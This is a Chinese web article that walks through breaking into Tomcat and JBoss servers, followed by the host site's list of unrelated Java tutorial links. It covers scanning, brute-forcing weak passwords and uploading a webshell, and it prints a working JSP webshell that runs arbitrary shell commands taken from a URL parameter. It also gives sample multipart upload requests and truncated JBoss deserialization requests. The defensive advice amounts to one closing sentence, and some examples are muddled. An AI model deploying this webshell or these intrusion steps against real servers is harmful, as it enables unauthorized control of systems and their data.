伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)

伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)

本文将介绍伪黑客常用的tomcat和Jboss入侵方法,帮助读者更好地了解网络安全和防范黑客攻击。以下是详细攻略:

一、tomcat入侵

1.漏洞扫描

1.1 先扫描端口,确认tomcat是否开启。

1.2 对tomcat的目录进行爆破,找出存在漏洞的页面。

2.弱口令破解

尝试使用常见的弱口令字典,进行暴力破解。

3.文件上传漏洞

尝试上传jsp一句话木马,写入webshell。

示例1:使用工具hackbar模拟文件上传漏洞:

POST /examples/jsp/upload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1234567890
Content-Length: 395

-----------------------------1234567890
Content-Disposition: form-data; name="fileType"

1
-----------------------------1234567890
Content-Disposition: form-data; name="filename"

web3shell.jsp
-----------------------------1234567890
Content-Disposition: form-data; name="savePath"

/
-----------------------------1234567890
Content-Disposition: form-data; name="file"; filename="web3shell.jsp"
Content-Type: application/octet-stream

<% out.println("Hello World!");%>
-----------------------------1234567890--

4.命令执行漏洞

尝试利用命令执行漏洞,获取web服务器的shell权限。

示例2:使用命令执行漏洞获取web服务器shell权限:

http://localhost:8080/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=67145B74E8C299B7975268F4FA054C6C

在上传的jsp页面里加上一段代码:

<%
if(request.getParameter("cmd")!=null){
    try {
        String cmd = request.getParameter("cmd");
        String[] cmds = new String[] {"/bin/sh", "-c", cmd};
        Process p = Runtime.getRuntime().exec(cmds);
        BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while((line=br.readLine())!=null){
            out.println(line+"<br>");
        }
        br.close();
    } catch (Exception e){
        e.printStackTrace();
    }
}
%>

然后就可以通过以下url执行系统命令:

http://localhost:8080/upload/shell.jsp?cmd=whoami

二、Jboss入侵

1.漏洞扫描

1.1 先扫描端口,确认jboss是否开启。

1.2 对jboss的目录进行爆破,找出存在漏洞的页面。

2.弱口令破解

尝试使用常见的弱口令字典,进行暴力破解。

3.反序列化漏洞

利用Jboss的反序列化漏洞,写入webshell获取shell权限。

示例3:使用序列化漏洞获取web服务器shell权限:

POST /invoker/JMSServlet HTTP/1.1
Host: localhost:8080
Content-Length: 535
Connection: close
Content-Type: application/x-java-serialized-object
class=org.jboss.invocation.MarshalledInvocation&object=
rO0ABXNyABpqYXZhLmxhbmcu...

在序列化的内容中添加一句话木马即可,如:

POST /invoker/JMSServlet HTTP/1.1
Host: localhost:8080
Content-Length: 431
Connection: close
Content-Type: application/x-java-serialized-object
class=org.jboss.invocation.MarshalledInvocation&object=...

结论

tomcat和Jboss作为常见的服务器程序,存在许多安全漏洞。黑客可以通过漏洞扫描、弱口令破解、文件上传漏洞、命令执行漏洞以及反序列化漏洞等方法攻击服务器,获取系统权限。建议系统管理员加强服务器安全配置,定期检查漏洞,提高系统安全性。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图) - Python技术站

(0)
上一篇 2023年6月15日
下一篇 2023年6月15日

相关文章

  • Java实现花卉管理系统

    Java实现花卉管理系统攻略 1. 系统需求分析 在实现花卉管理系统前,需要进行系统需求分析,明确要实现什么功能。花卉管理系统需要实现以下功能: 用户可以注册账号、登录、修改密码、注销账号。 用户可以查看花卉品种、价格、产地、剪枝难度等信息。 系统管理员可以添加、删除、修改花卉品种。 用户可以按照花卉品种、价格等条件进行搜索和筛选。 用户可以将花卉加入购物车…

    Java 2023年5月19日
    00
  • Spring Boot启动过程(四)之Spring Boot内嵌Tomcat启动

    下面详细讲解SpringBoot内嵌Tomcat启动的完整攻略,并提供两条示例。 1. 概述 SpringBoot是一款非常流行的轻量级JavaWeb框架,旨在简化Spring的配置和开发过程。内嵌Tomcat是SpringBoot的默认Web服务器,可以快速的构建发布Web应用,并支持自定义Tomcat的设置。 2. SpringBoot内嵌Tomcat启…

    Java 2023年5月15日
    00
  • 基于Struts文件上传(FormFile)详解

    基于Struts文件上传(FormFile)详解 1. 引入依赖 首先,需要在项目中引入struts-fileupload库。这个库是用来实现文件上传功能的。在项目的pom.xml文件中,添加以下依赖: <dependency> <groupId>commons-fileupload</groupId> <artif…

    Java 2023年5月20日
    00
  • Linux下Tomcat8.0.44配置使用Apr的方法

    下面是详细讲解Linux下Tomcat8.0.44配置使用Apr的方法的完整攻略: 前置条件 已安装Apache Tomcat 8.0.44和相关依赖库; 已安装APR(Apache Portable Runtime)库。 步骤一:下载并解压APR 首先,需要从APR官网下载APR和APR-util压缩包,并解压到本地某个目录。以APR 1.7.0版本为例,…

    Java 2023年5月19日
    00
  • Java源码刨析之ArrayDeque

    Java源码刨析之ArrayDeque Java中的ArrayDeque是一种基于动态数组的双端队列数据结构。本篇文章将与读者一起深入分析Java中ArrayDeque的源代码,从中学习这种数据结构的实现原理。 容量扩充 由于使用动态数组来存储队列中的元素,因此在添加元素时,需要判断是否需要扩展数组的容量。容量扩充的代码实现如下: private void …

    Java 2023年5月26日
    00
  • 如何创建线程池?

    以下是关于如何创建线程池的完整使用攻略: 如何创建线程池? 在Java中,可以使用java.util.concurrent包中的Executor框架来创建线程池。Executor框架提供了一组于管理线程池的接口和类,可以方便地创建和管理线程池。 创建线程池的步骤 创建线程池的步骤如下: 创建一个ExecutorService对象,该对象是一个线程池的管理器。…

    Java 2023年5月12日
    00
  • JSP实用教程之简易页面编辑器的实现方法(附源码)

    首先我们先来了解一下题目中的内容: JSP实用教程之简易页面编辑器的实现方法(附源码) 该文章是一篇针对JSP编程和页面编辑器的教程,主要介绍了如何使用JSP编写一个简易的页面编辑器,同时也附有源码提供下载。 下面我们来分步骤详细讲解该教程的实现方法: 1、目标 首先,我们需要明确本篇教程的目标是什么。本篇教程要实现的是一个基于JSP的简易页面编辑器,能够实…

    Java 2023年6月15日
    00
  • Spring 5.0集成log4j2日志管理的示例代码

    下面详细讲解一下“Spring 5.0集成log4j2日志管理的示例代码”的完整攻略。 一、前置知识 在讲解Spring 5.0集成log4j2日志管理的示例代码前,需要了解一下以下基础知识: log4j2:是一个Java的日志框架,可以帮助Java开发者在应用程序中打印日志; Spring 5.0:是一个Java应用程序框架,可以帮助开发者创建Web应用程…

    Java 2023年5月19日
    00
合作推广
合作推广
分享本页
返回顶部